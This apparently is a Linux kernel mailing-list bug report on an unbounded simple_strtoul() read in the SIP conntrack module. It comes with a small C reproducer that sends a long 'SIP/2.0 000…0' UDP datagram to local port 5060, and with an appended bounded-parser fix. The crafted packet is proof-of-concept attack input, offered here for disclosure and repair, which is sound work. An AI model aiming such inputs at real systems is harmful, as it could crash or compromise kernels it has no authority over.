There is a bug waiting to happen in the SIP conntracking module. Look at the sip_help_udp() => process_sip_response() => simple_strtoul() sequence. simple_strtoul() can consume an infinite amount of characters because it doesn't stop on overflow and reads past the end of the buffer. Passing a long stream of zeroes works.

I wasted a lot of time trying to reproduce a remote crash only to find out that "struct skb_shared_info" is shipped at the end of the data attached to the skb and thus acts like a terminator (enough characters which are not 0-9). In slab debug kernels the simple_strtoul() call definitely stops at the poison byte (easy to check). So, the crash exists but is masked (fully?) by skb internals.

Not knowing the SIP protocol, I'm not sending a patch. :-)

Attaching my lame "reproducer" which sends the string "SIP/2.0 0000000000...0"

	Alexey

nc -u -l -p 5060
iptables -A INPUT -m state --state ESTABLISHED,RELATED -j ACCEPT
iptables -A INPUT -p udp --dport 5060 -j ACCEPT

#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>

#define N 70

int main(int argc, char *argv[])
{
	struct sockaddr_in addr;
	int fd;
	unsigned char *buf;

	/* "SIP/2.0 " followed by '0' bytes up to N bytes total: no non-digit
	 * terminator inside the datagram itself. */
	buf = malloc(8 + N);
	memcpy(buf, "SIP/2.0 ", 8);
	memset(buf + 8, '0', N - 8);

	fd = socket(AF_INET, SOCK_DGRAM, 0);

	/* Send one UDP datagram to the local SIP port (5060). */
	memset(&addr, 0, sizeof(struct sockaddr_in));
	addr.sin_family = AF_INET;
	addr.sin_addr.s_addr = inet_addr("127.0.0.1");
	addr.sin_port = htons(5060);
//	while (1) {
		sendto(fd, buf, N, 0, (struct sockaddr *)&addr, sizeof(struct sockaddr_in));
//	}
	return 0;
}
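What the parse in process_sip_response() would have to look like to be safe against this datagram: a digit parser that is bounded by the buffer length and rejects overflow, instead of relying on a terminator that happens to follow the data. This is an added illustration, not code from the message or from the kernel; parse_bounded_ulong() and sip_response_code() are hypothetical names, and the only page-specific input is the reproducer's "SIP/2.0 000…0" datagram.

```c
#include <limits.h>
#include <stdbool.h>
#include <stddef.h>
#include <string.h>

/* Parse an unsigned decimal from buf[0..len) without reading past len.
 * Fails when no digit is present, when the digits run to the very end of
 * the buffer (no terminator, so the number may be cut off), or on overflow.
 * Illustrative bounded stand-in for the unbounded simple_strtoul() call. */
static bool parse_bounded_ulong(const unsigned char *buf, size_t len,
                                unsigned long *out, size_t *consumed)
{
    unsigned long val = 0;
    size_t i;

    for (i = 0; i < len && buf[i] >= '0' && buf[i] <= '9'; i++) {
        unsigned int d = buf[i] - '0';
        if (val > (ULONG_MAX - d) / 10)   /* val * 10 + d would overflow */
            return false;
        val = val * 10 + d;
    }
    if (i == 0 || i == len)
        return false;
    *out = val;
    *consumed = i;
    return true;
}

/* Status code of a SIP response line held in exactly len bytes of buf:
 * "SIP/2.0 ", three digits, a space, then the reason phrase. */
static bool sip_response_code(const unsigned char *buf, size_t len,
                              unsigned long *code)
{
    static const char prefix[] = "SIP/2.0 ";
    const size_t plen = sizeof(prefix) - 1;
    size_t used;

    if (len < plen || memcmp(buf, prefix, plen) != 0)
        return false;
    if (!parse_bounded_ulong(buf + plen, len - plen, code, &used))
        return false;
    return used == 3 && buf[plen + used] == ' ';   /* in bounds: plen+used < len */
}

/* Status code of a line, or 0 when the line is rejected. */
static unsigned long code_of(const char *line, size_t len)
{
    unsigned long code = 0;
    return sip_response_code((const unsigned char *)line, len, &code) ? code : 0;
}

/* The reproducer's datagram: "SIP/2.0 " plus 62 '0' bytes, 70 bytes total (constructed). */
static bool reproducer_payload_rejected(void)
{
    unsigned char buf[70];
    unsigned long code;

    memcpy(buf, "SIP/2.0 ", 8);
    memset(buf + 8, '0', sizeof(buf) - 8);
    return !sip_response_code(buf, sizeof(buf), &code);
}
```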